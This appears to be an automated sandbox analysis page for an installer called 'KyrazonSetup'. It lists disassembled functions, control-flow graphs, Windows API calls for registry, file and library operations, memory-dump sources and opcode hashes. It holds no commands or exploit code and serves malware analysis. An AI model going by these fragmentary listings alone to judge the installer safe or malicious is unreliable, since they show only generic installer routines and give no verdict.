                                                                                      control_flow_graph 728 4023d6-402407 call 402acb * 2 call 402b5b 735 402957-402966 728->735 736 40240d-402417 728->736 737 402427-40242a 736->737 738 402419-402426 call 402acb lstrlenA 736->738 740 40242c-40243d call 402aa9 737->740 741 40243e-402441 737->741 738->737 740->741 745 402452-402466 RegSetValueExA 741->745 746 402443-40244d call 402f9c 741->746 750 402468 745->750 751 40246b-402548 RegCloseKey 745->751 746->745 750->751 751->735 753 40271c-402723 751->753 753->735
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000023,00000011,00000002), ref: 00402421
                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 0040245E
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp
                                                                                      • API String ID: 2655323295-3732279548
                                                                                      • Opcode ID: 89191b3c74185597823c63b96631895be5d91288e44303a49c20697d39e5a080
                                                                                      • Instruction ID: 4c89e87aedaa5372dc267e27c604b307b221bfd6f664262a5d927997ae6a1bde
                                                                                      • Opcode Fuzzy Hash: 89191b3c74185597823c63b96631895be5d91288e44303a49c20697d39e5a080
                                                                                      • Instruction Fuzzy Hash: D011D371E00215BEEF00EFA5DE49AAEBA74EB44318F20843BF504F71D1C6B94D419B68
                                                                                      Function 00402003 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 754 402003-40200f 755 402015-40202b call 402acb * 2 754->755 756 4020ca-4020cc 754->756 766 40203a-402048 LoadLibraryExA 755->766 767 40202d-402038 GetModuleHandleA 755->767 758 40223d-402242 call 401423 756->758 763 402957-402966 758->763 764 40271c-402723 758->764 764->763 769 40204a-402057 GetProcAddress 766->769 770 4020c3-4020c5 766->770 767->766 767->769 772 402096-40209b call 4050c7 769->772 773 402059-40205f 769->773 770->758 777 4020a0-4020a3 772->777 775 402061-40206d call 401423 773->775 776 402078-40208c 773->776 775->777 785 40206f-402076 775->785 779 402091-402094 776->779 777->763 780 4020a9-4020b1 call 40376e 777->780 779->777 780->763 786 4020b7-4020be FreeLibrary 780->786 785->777 786->763
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                        • Part of subcall function 004050C7: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                        • Part of subcall function 004050C7: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2987980305-0
                                                                                      • Opcode ID: 6af1e7eb7492141e71dde090e7896947b62a3459544a7b43b51ee23b6ebd047d
                                                                                      • Instruction ID: 925a26e0c59fcdbf3a92d1332ba84001e2e342ce267d8cdd70d9c1fb8e3a0ef4
                                                                                      • Opcode Fuzzy Hash: 6af1e7eb7492141e71dde090e7896947b62a3459544a7b43b51ee23b6ebd047d
                                                                                      • Instruction Fuzzy Hash: 0621C971A00215B7CF207FA48F4DBAE7A616B51359F20413BE611B21D0DBBD4942D66E
                                                                                      Function 0040558D Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 787 40558d-4055d8 CreateDirectoryA 788 4055da-4055dc 787->788 789 4055de-4055eb GetLastError 787->789 790 405605-405607 788->790 789->790 791 4055ed-405601 SetFileSecurityA 789->791 791->788 792 405603 GetLastError 791->792 792->790
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE(?,?,00485000), ref: 004055D0
                                                                                      • GetLastError.KERNEL32 ref: 004055E4
                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                                                                                      • GetLastError.KERNEL32 ref: 00405603
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3449924974-0
                                                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                                      • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                                                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                                      • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9
                                                                                      Function 00405A26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 793 405a26-405a41 call 405fa0 call 4059d1 798 405a43-405a45 793->798 799 405a47-405a54 call 40620a 793->799 800 405a99-405a9b 798->800 803 405a60-405a62 799->803 804 405a56-405a5a 799->804 806 405a78-405a81 lstrlenA 803->806 804->798 805 405a5c-405a5e 804->805 805->798 805->803 807 405a83-405a97 call 405938 GetFileAttributesA 806->807 808 405a64-405a6b call 4062a3 806->808 807->800 813 405a72-405a73 call 40597f 808->813 814 405a6d-405a70 808->814 813->806 814->798 814->813
                                                                                      APIs
                                                                                        • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00002000,004032DE,0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                                                      • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 00405A79
                                                                                      • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 00405A89
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3248276644-3404278061
                                                                                      • Opcode ID: 3b6d0c4ebac4798025594113f83dd9a311929e9887e3f7bb7884b5d6324322d4
                                                                                      • Instruction ID: d48a74c6cf84c1e4d32e0e1ba1c73eb4ee50dba0b310f8fa03ff64586fce4bcf
                                                                                      • Opcode Fuzzy Hash: 3b6d0c4ebac4798025594113f83dd9a311929e9887e3f7bb7884b5d6324322d4
                                                                                      • Instruction Fuzzy Hash: 04F04C26305E6556C722723A4C85A9F1A04CEC3324719073FF891F12D2DB3C8A439DBE
                                                                                      Function 00405B68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405B7C
                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: nsa
                                                                                      • API String ID: 1716503409-2209301699
                                                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                      • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                                                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                      • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58
                                                                                      Function 00401B63 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNELBASE(02AD9E38), ref: 00401BD2
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401BE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: ExecShellAsUser
                                                                                      • API String ID: 3394109436-869331269
                                                                                      • Opcode ID: 909f4a83088a287ebc55af16c66f981feb6b1da81deccf2253087fc64da2977b
                                                                                      • Instruction ID: f6d7ead896680d37f92cdf99bd6625021356cee69a39ee0e8c8ac6ad6d468d56
                                                                                      • Opcode Fuzzy Hash: 909f4a83088a287ebc55af16c66f981feb6b1da81deccf2253087fc64da2977b
                                                                                      • Instruction Fuzzy Hash: 3E2108B27001429BDB10EB94DD88E9F73A8EB84318B10443BF151F72C0DB7CA8418B6D
                                                                                      Function 0040224B Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004062A3: FindFirstFileA.KERNELBASE(74DF3410,004480C0,C:\,00405A69,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 004062AE
                                                                                        • Part of subcall function 004062A3: FindClose.KERNELBASE(00000000), ref: 004062BA
                                                                                      • lstrlenA.KERNEL32 ref: 0040228B
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00402295
                                                                                      • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 01c39747f4571799e565524aea2ea4f99065a1f4da79d757333e85a17dd115f4
                                                                                      • Instruction ID: 349dabc4e121e40637a2e3f52c057a668796bcb7f348320b075967da111ca0c3
                                                                                      • Opcode Fuzzy Hash: 01c39747f4571799e565524aea2ea4f99065a1f4da79d757333e85a17dd115f4
                                                                                      • Instruction Fuzzy Hash: C8117071A04345AACB10EFF98A4999EBBB8EF05308F14443FA000F72C1D6BCC5408B69
                                                                                      Function 00405720 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405B14: GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                                                        • Part of subcall function 00405B14: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D
                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,0040590F), ref: 0040573B
                                                                                      • DeleteFileA.KERNELBASE(?,?,?,00000000,0040590F), ref: 00405743
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040575B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1655745494-0
                                                                                      • Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                                                                                      • Instruction ID: 41a59d98901dadf9faebb98bb098dbd3bab940c68288cb1340f4b8977cea5a50
                                                                                      • Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                                                                                      • Instruction Fuzzy Hash: FCE0E531115A9197C61177308E0CA5B2AD8DFC6324F09493AF492B31C0C778444ADA6E
                                                                                      Function 004015BB Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
